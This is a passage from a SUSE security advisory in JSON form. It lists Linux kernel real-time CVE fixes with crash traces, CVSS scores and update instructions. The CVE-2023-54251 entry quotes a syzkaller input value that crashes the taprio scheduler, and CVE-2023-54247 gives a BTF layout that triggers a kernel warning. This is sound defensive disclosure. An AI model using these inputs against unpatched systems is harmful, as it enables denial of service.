"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54230"
},
{
"cve": "CVE-2023-54235",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54235"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/DOE: Fix destroy_work_on_stack() race\n\nThe following debug object splat was observed in testing:\n\n ODEBUG: free active (active state 0) object: 0000000097d23782 object type: work_struct hint: doe_statemachine_work+0x0/0x510\n WARNING: CPU: 1 PID: 71 at lib/debugobjects.c:514 debug_print_object+0x7d/0xb0\n ...\n Workqueue: pci 0000:36:00.0 DOE [1 doe_statemachine_work\n RIP: 0010:debug_print_object+0x7d/0xb0\n ...\n Call Trace:\n ? debug_print_object+0x7d/0xb0\n ? __pfx_doe_statemachine_work+0x10/0x10\n debug_object_free.part.0+0x11b/0x150\n doe_statemachine_work+0x45e/0x510\n process_one_work+0x1d4/0x3c0\n\nThis occurs because destroy_work_on_stack() was called after signaling\nthe completion in the calling thread. This creates a race between\ndestroy_work_on_stack() and the task-\u003ework struct going out of scope in\npci_doe().\n\nSignal the work complete after destroying the work struct. This is safe\nbecause signal_task_complete() is the final thing the work item does and\nthe workqueue code is careful not to access the work struct after.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54235",
"url": "https://www.suse.com/security/cve/CVE-2023-54235"
},
{
"category": "external",
"summary": "SUSE Bug 1255921 for CVE-2023-54235",
"url": "https://bugzilla.suse.com/1255921"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54235"
},
{
"cve": "CVE-2023-54240",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54240"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ethernet: mtk_eth_soc: fix possible NULL pointer dereference in mtk_hwlro_get_fdir_all()\n\nrule_locs is allocated in ethtool_get_rxnfc and the size is determined by\nrule_cnt from user space. So rule_cnt needs to be check before using\nrule_locs to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54240",
"url": "https://www.suse.com/security/cve/CVE-2023-54240"
},
{
"category": "external",
"summary": "SUSE Bug 1255918 for CVE-2023-54240",
"url": "https://bugzilla.suse.com/1255918"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54240"
},
{
"cve": "CVE-2023-54241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nMIPS: KVM: Fix NULL pointer dereference\n\nAfter commit 45c7e8af4a5e3f0bea4ac209 (\"MIPS: Remove KVM_TE support\") we\nget a NULL pointer dereference when creating a KVM guest:\n\n[ 146.243409] Starting KVM with MIPS VZ extensions\n[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c\n[ 149.849177] Oops[#1]:\n[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671\n[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020\n[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740\n[ 149.849209] $ 4 : 000000007400cce1 000000007400cce1 0000000000000000 0000000000000000\n[ 149.849221] $ 8 : 000000240058bb36 ffffffff81421ac0 0000000000000000 0000000000400dc0\n[ 149.849233] $12 : 9800000102a07cc8 ffffffff80e40e38 0000000000000001 0000000000400dc0\n[ 149.849245] $16 : 0000000000000000 9800000106cd0000 9800000106cd0000 9800000100cce000\n[ 149.849257] $20 : ffffffffc0632b28 ffffffffc05b31b0 9800000100ccca00 0000000000400000\n[ 149.849269] $24 : 9800000106cd09ce ffffffff802f69d0\n[ 149.849281] $28 : 9800000102a04000 9800000102a07cd0 98000001106a8000 ffffffffc063568c\n[ 149.849293] Hi : 00000335b2111e66\n[ 149.849295] Lo : 6668d90061ae0ae9\n[ 149.849298] epc : ffffffffc06356ec kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849324] ra : ffffffffc063568c kvm_vz_vcpu_setup+0x64/0x328 [kvm]\n[ 149.849336] Status: 7400cce3 KX SX UX KERNEL EXL IE\n[ 149.849351] Cause : 1000000c (ExcCode 03)\n[ 149.849354] BadVA : 0000000000000300\n[ 149.849357] PrId : 0014c004 (ICT Loongson-3)\n[ 149.849360] Modules linked in: kvm nfnetlink_queue nfnetlink_log nfnetlink fuse sha256_generic libsha256 cfg80211 rfkill binfmt_misc vfat fat snd_hda_codec_hdmi input_leds led_class snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_pcm snd_timer snd serio_raw xhci_pci radeon drm_suballoc_helper drm_display_helper xhci_hcd ip_tables x_tables\n[ 149.849432] Process qemu-system-mip (pid: 2265, threadinfo=00000000ae2982d2, task=0000000038e09ad4, tls=000000ffeba16030)\n[ 149.849439] Stack : 9800000000000003 9800000100ccca00 9800000100ccc000 ffffffffc062cef4\n[ 149.849453] 9800000102a07d18 c89b63a7ab338e00 0000000000000000 ffffffff811a0000\n[ 149.849465] 0000000000000000 9800000106cd0000 ffffffff80e59938 98000001106a8920\n[ 149.849476] ffffffff80e57f30 ffffffffc062854c ffffffff811a0000 9800000102bf4240\n[ 149.849488] ffffffffc05b0000 ffffffff80e3a798 000000ff78000000 000000ff78000010\n[ 149.849500] 0000000000000255 98000001021f7de0 98000001023f0078 ffffffff81434000\n[ 149.849511] 0000000000000000 0000000000000000 9800000102ae0000 980000025e92ae28\n[ 149.849523] 0000000000000000 c89b63a7ab338e00 0000000000000001 ffffffff8119dce0\n[ 149.849535] 000000ff78000010 ffffffff804f3d3c 9800000102a07eb0 0000000000000255\n[ 149.849546] 0000000000000000 ffffffff8049460c 000000ff78000010 0000000000000255\n[ 149.849558] ...\n[ 149.849565] Call Trace:\n[ 149.849567] [\u003cffffffffc06356ec\u003e] kvm_vz_vcpu_setup+0xc4/0x328 [kvm]\n[ 149.849586] [\u003cffffffffc062cef4\u003e] kvm_arch_vcpu_create+0x184/0x228 [kvm]\n[ 149.849605] [\u003cffffffffc062854c\u003e] kvm_vm_ioctl+0x64c/0xf28 [kvm]\n[ 149.849623] [\u003cffffffff805209c0\u003e] sys_ioctl+0xc8/0x118\n[ 149.849631] [\u003cffffffff80219eb0\u003e] syscall_common+0x34/0x58\n\nThe root cause is the deletion of kvm_mips_commpage_init() leaves vcpu\n-\u003earch.cop0 NULL. So fix it by making cop0 from a pointer to an embedded\nobject.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54241",
"url": "https://www.suse.com/security/cve/CVE-2023-54241"
},
{
"category": "external",
"summary": "SUSE Bug 1255838 for CVE-2023-54241",
"url": "https://bugzilla.suse.com/1255838"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54241"
},
{
"cve": "CVE-2023-54246",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54246"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrcuscale: Move rcu_scale_writer() schedule_timeout_uninterruptible() to _idle()\n\nThe rcuscale.holdoff module parameter can be used to delay the start\nof rcu_scale_writer() kthread. However, the hung-task timeout will\ntrigger when the timeout specified by rcuscale.holdoff is greater than\nhung_task_timeout_secs:\n\nrunqemu kvm nographic slirp qemuparams=\"-smp 4 -m 2048M\"\nbootparams=\"rcuscale.shutdown=0 rcuscale.holdoff=300\"\n\n[ 247.071753] INFO: task rcu_scale_write:59 blocked for more than 122 seconds.\n[ 247.072529] Not tainted 6.4.0-rc1-00134-gb9ed6de8d4ff #7\n[ 247.073400] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this message.\n[ 247.074331] task:rcu_scale_write state:D stack:30144 pid:59 ppid:2 flags:0x00004000\n[ 247.075346] Call Trace:\n[ 247.075660] \u003cTASK\u003e\n[ 247.075965] __schedule+0x635/0x1280\n[ 247.076448] ? __pfx___schedule+0x10/0x10\n[ 247.076967] ? schedule_timeout+0x2dc/0x4d0\n[ 247.077471] ? __pfx_lock_release+0x10/0x10\n[ 247.078018] ? enqueue_timer+0xe2/0x220\n[ 247.078522] schedule+0x84/0x120\n[ 247.078957] schedule_timeout+0x2e1/0x4d0\n[ 247.079447] ? __pfx_schedule_timeout+0x10/0x10\n[ 247.080032] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.080591] ? __pfx_process_timeout+0x10/0x10\n[ 247.081163] ? __pfx_sched_set_fifo_low+0x10/0x10\n[ 247.081760] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.082287] rcu_scale_writer+0x6b1/0x7f0\n[ 247.082773] ? mark_held_locks+0x29/0xa0\n[ 247.083252] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.083865] ? __pfx_rcu_scale_writer+0x10/0x10\n[ 247.084412] kthread+0x179/0x1c0\n[ 247.084759] ? __pfx_kthread+0x10/0x10\n[ 247.085098] ret_from_fork+0x2c/0x50\n[ 247.085433] \u003c/TASK\u003e\n\nThis commit therefore replaces schedule_timeout_uninterruptible() with\nschedule_timeout_idle().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54246",
"url": "https://www.suse.com/security/cve/CVE-2023-54246"
},
{
"category": "external",
"summary": "SUSE Bug 1255915 for CVE-2023-54246",
"url": "https://bugzilla.suse.com/1255915"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54246"
},
{
"cve": "CVE-2023-54247",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54247"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Silence a warning in btf_type_id_size()\n\nsyzbot reported a warning in [1] with the following stacktrace:\n WARNING: CPU: 0 PID: 5005 at kernel/bpf/btf.c:1988 btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n RIP: 0010:btf_type_id_size+0x2d9/0x9d0 kernel/bpf/btf.c:1988\n ...\n Call Trace:\n \u003cTASK\u003e\n map_check_btf kernel/bpf/syscall.c:1024 [inline]\n map_create+0x1157/0x1860 kernel/bpf/syscall.c:1198\n __sys_bpf+0x127f/0x5420 kernel/bpf/syscall.c:5040\n __do_sys_bpf kernel/bpf/syscall.c:5162 [inline]\n __se_sys_bpf kernel/bpf/syscall.c:5160 [inline]\n __x64_sys_bpf+0x79/0xc0 kernel/bpf/syscall.c:5160\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x63/0xcd\n\nWith the following btf\n [1] DECL_TAG \u0027a\u0027 type_id=4 component_idx=-1\n [2] PTR \u0027(anon)\u0027 type_id=0\n [3] TYPE_TAG \u0027a\u0027 type_id=2\n [4] VAR \u0027a\u0027 type_id=3, linkage=static\nand when the bpf_attr.btf_key_type_id = 1 (DECL_TAG),\nthe following WARN_ON_ONCE in btf_type_id_size() is triggered:\n if (WARN_ON_ONCE(!btf_type_is_modifier(size_type) \u0026\u0026\n !btf_type_is_var(size_type)))\n return NULL;\n\nNote that \u0027return NULL\u0027 is the correct behavior as we don\u0027t want\na DECL_TAG type to be used as a btf_{key,value}_type_id even\nfor the case like \u0027DECL_TAG -\u003e STRUCT\u0027. So there\nis no correctness issue here, we just want to silence warning.\n\nTo silence the warning, I added DECL_TAG as one of kinds in\nbtf_type_nosize() which will cause btf_type_id_size() returning\nNULL earlier without the warning.\n\n [1] https://lore.kernel.org/bpf/000000000000e0df8d05fc75ba86@google.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54247",
"url": "https://www.suse.com/security/cve/CVE-2023-54247"
},
{
"category": "external",
"summary": "SUSE Bug 1255892 for CVE-2023-54247",
"url": "https://bugzilla.suse.com/1255892"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54247"
},
{
"cve": "CVE-2023-54251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54251"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: taprio: Limit TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME to INT_MAX.\n\nsyzkaller found zero division error [0] in div_s64_rem() called from\nget_cycle_time_elapsed(), where sched-\u003ecycle_time is the divisor.\n\nWe have tests in parse_taprio_schedule() so that cycle_time will never\nbe 0, and actually cycle_time is not 0 in get_cycle_time_elapsed().\n\nThe problem is that the types of divisor are different; cycle_time is\ns64, but the argument of div_s64_rem() is s32.\n\nsyzkaller fed this input and 0x100000000 is cast to s32 to be 0.\n\n @TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME={0xc, 0x8, 0x100000000}\n\nWe use s64 for cycle_time to cast it to ktime_t, so let\u0027s keep it and\nset max for cycle_time.\n\nWhile at it, we prevent overflow in setup_txtime() and add another\ntest in parse_taprio_schedule() to check if cycle_time overflows.\n\nAlso, we add a new tdc test case for this issue.\n\n[0]:\ndivide error: 0000 [#1] PREEMPT SMP KASAN NOPTI\nCPU: 1 PID: 103 Comm: kworker/1:3 Not tainted 6.5.0-rc1-00330-g60cc1f7d0605 #3\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nWorkqueue: ipv6_addrconf addrconf_dad_work\nRIP: 0010:div_s64_rem include/linux/math64.h:42 [inline]\nRIP: 0010:get_cycle_time_elapsed net/sched/sch_taprio.c:223 [inline]\nRIP: 0010:find_entry_to_transmit+0x252/0x7e0 net/sched/sch_taprio.c:344\nCode: 3c 02 00 0f 85 5e 05 00 00 48 8b 4c 24 08 4d 8b bd 40 01 00 00 48 8b 7c 24 48 48 89 c8 4c 29 f8 48 63 f7 48 99 48 89 74 24 70 \u003c48\u003e f7 fe 48 29 d1 48 8d 04 0f 49 89 cc 48 89 44 24 20 49 8d 85 10\nRSP: 0018:ffffc90000acf260 EFLAGS: 00010206\nRAX: 177450e0347560cf RBX: 0000000000000000 RCX: 177450e0347560cf\nRDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000100000000\nRBP: 0000000000000056 R08: 0000000000000000 R09: ffffed10020a0934\nR10: ffff8880105049a7 R11: ffff88806cf3a520 R12: ffff888010504800\nR13: ffff88800c00d800 R14: ffff8880105049a0 R15: 0000000000000000\nFS: 0000000000000000(0000) GS:ffff88806cf00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f0edf84f0e8 CR3: 000000000d73c002 CR4: 0000000000770ee0\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n get_packet_txtime net/sched/sch_taprio.c:508 [inline]\n taprio_enqueue_one+0x900/0xff0 net/sched/sch_taprio.c:577\n taprio_enqueue+0x378/0xae0 net/sched/sch_taprio.c:658\n dev_qdisc_enqueue+0x46/0x170 net/core/dev.c:3732\n __dev_xmit_skb net/core/dev.c:3821 [inline]\n __dev_queue_xmit+0x1b2f/0x3000 net/core/dev.c:4169\n dev_queue_xmit include/linux/netdevice.h:3088 [inline]\n neigh_resolve_output net/core/neighbour.c:1552 [inline]\n neigh_resolve_output+0x4a7/0x780 net/core/neighbour.c:1532\n neigh_output include/net/neighbour.h:544 [inline]\n ip6_finish_output2+0x924/0x17d0 net/ipv6/ip6_output.c:135\n __ip6_finish_output+0x620/0xaa0 net/ipv6/ip6_output.c:196\n ip6_finish_output net/ipv6/ip6_output.c:207 [inline]\n NF_HOOK_COND include/linux/netfilter.h:292 [inline]\n ip6_output+0x206/0x410 net/ipv6/ip6_output.c:228\n dst_output include/net/dst.h:458 [inline]\n NF_HOOK.constprop.0+0xea/0x260 include/linux/netfilter.h:303\n ndisc_send_skb+0x872/0xe80 net/ipv6/ndisc.c:508\n ndisc_send_ns+0xb5/0x130 net/ipv6/ndisc.c:666\n addrconf_dad_work+0xc14/0x13f0 net/ipv6/addrconf.c:4175\n process_one_work+0x92c/0x13a0 kernel/workqueue.c:2597\n worker_thread+0x60f/0x1240 kernel/workqueue.c:2748\n kthread+0x2fe/0x3f0 kernel/kthread.c:389\n ret_from_fork+0x2c/0x50 arch/x86/entry/entry_64.S:308\n \u003c/TASK\u003e\nModules linked in:",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54251",
"url": "https://www.suse.com/security/cve/CVE-2023-54251"
},
{
"category": "external",
"summary": "SUSE Bug 1255888 for CVE-2023-54251",
"url": "https://bugzilla.suse.com/1255888"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54251"
},
{
"cve": "CVE-2023-54253",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54253"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: set page extent mapped after read_folio in relocate_one_page\n\nOne of the CI runs triggered the following panic\n\n assertion failed: PagePrivate(page) \u0026\u0026 page-\u003eprivate, in fs/btrfs/subpage.c:229\n ------------[ cut here ]------------\n kernel BUG at fs/btrfs/subpage.c:229!\n Internal error: Oops - BUG: 00000000f2000800 [#1] SMP\n CPU: 0 PID: 923660 Comm: btrfs Not tainted 6.5.0-rc3+ #1\n pstate: 61400005 (nZCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : btrfs_subpage_assert+0xbc/0xf0\n lr : btrfs_subpage_assert+0xbc/0xf0\n sp : ffff800093213720\n x29: ffff800093213720 x28: ffff8000932138b4 x27: 000000000c280000\n x26: 00000001b5d00000 x25: 000000000c281000 x24: 000000000c281fff\n x23: 0000000000001000 x22: 0000000000000000 x21: ffffff42b95bf880\n x20: ffff42b9528e0000 x19: 0000000000001000 x18: ffffffffffffffff\n x17: 667274622f736620 x16: 6e69202c65746176 x15: 0000000000000028\n x14: 0000000000000003 x13: 00000000002672d7 x12: 0000000000000000\n x11: ffffcd3f0ccd9204 x10: ffffcd3f0554ae50 x9 : ffffcd3f0379528c\n x8 : ffff800093213428 x7 : 0000000000000000 x6 : ffffcd3f091771e8\n x5 : ffff42b97f333948 x4 : 0000000000000000 x3 : 0000000000000000\n x2 : 0000000000000000 x1 : ffff42b9556cde80 x0 : 000000000000004f\n Call trace:\n btrfs_subpage_assert+0xbc/0xf0\n btrfs_subpage_set_dirty+0x38/0xa0\n btrfs_page_set_dirty+0x58/0x88\n relocate_one_page+0x204/0x5f0\n relocate_file_extent_cluster+0x11c/0x180\n relocate_data_extent+0xd0/0xf8\n relocate_block_group+0x3d0/0x4e8\n btrfs_relocate_block_group+0x2d8/0x490\n btrfs_relocate_chunk+0x54/0x1a8\n btrfs_balance+0x7f4/0x1150\n btrfs_ioctl+0x10f0/0x20b8\n __arm64_sys_ioctl+0x120/0x11d8\n invoke_syscall.constprop.0+0x80/0xd8\n do_el0_svc+0x6c/0x158\n el0_svc+0x50/0x1b0\n el0t_64_sync_handler+0x120/0x130\n el0t_64_sync+0x194/0x198\n Code: 91098021 b0007fa0 91346000 97e9c6d2 (d4210000)\n\nThis is the same problem outlined in 17b17fcd6d44 (\"btrfs:\nset_page_extent_mapped after read_folio in btrfs_cont_expand\") , and the\nfix is the same. I originally looked for the same pattern elsewhere in\nour code, but mistakenly skipped over this code because I saw the page\ncache readahead before we set_page_extent_mapped, not realizing that\nthis was only in the !page case, that we can still end up with a\n!uptodate page and then do the btrfs_read_folio further down.\n\nThe fix here is the same as the above mentioned patch, move the\nset_page_extent_mapped call to after the btrfs_read_folio() block to\nmake sure that we have the subpage blocksize stuff setup properly before\nusing the page.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
